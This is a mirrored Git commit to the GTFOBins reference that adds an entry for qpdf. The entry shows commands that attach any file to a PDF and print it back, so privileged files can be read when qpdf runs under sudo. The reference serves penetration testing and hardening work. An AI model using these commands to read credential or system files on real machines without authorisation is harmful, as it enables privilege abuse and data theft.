mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Added qpdf arbitrary file read
This commit is contained in:
parent
4eca50ea16
commit
c53efd1bfa
10
_gtfobins/qpdf.md
Normal file
10
_gtfobins/qpdf.md
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
---
|
||||||
|
description: QPDF is both a software library and a free command-line program that can convert one PDF file to another equivalent PDF file. It is capable of performing transformations such as linearization, encryption, and decryption of PDF files.
|
||||||
|
functions:
|
||||||
|
file-read:
|
||||||
|
- description: `qpdf` can be used to read any arbitrary file accessible to the running user, by attaching the target file to a valid PDF file, and then accessing that attachment. If the user is allowed to run `qpdf` as an elevated user (e.g with `sudo`), privileged files can be read.
|
||||||
|
code: |
|
||||||
|
FILE_TO_READ="/path/to/file"
|
||||||
|
qpdf --qdf --add-attachment $FILE_TO_READ --key=anykey -- valid.pdf output.pdf
|
||||||
|
qpdf --show-attachment=anykey output.pdf
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user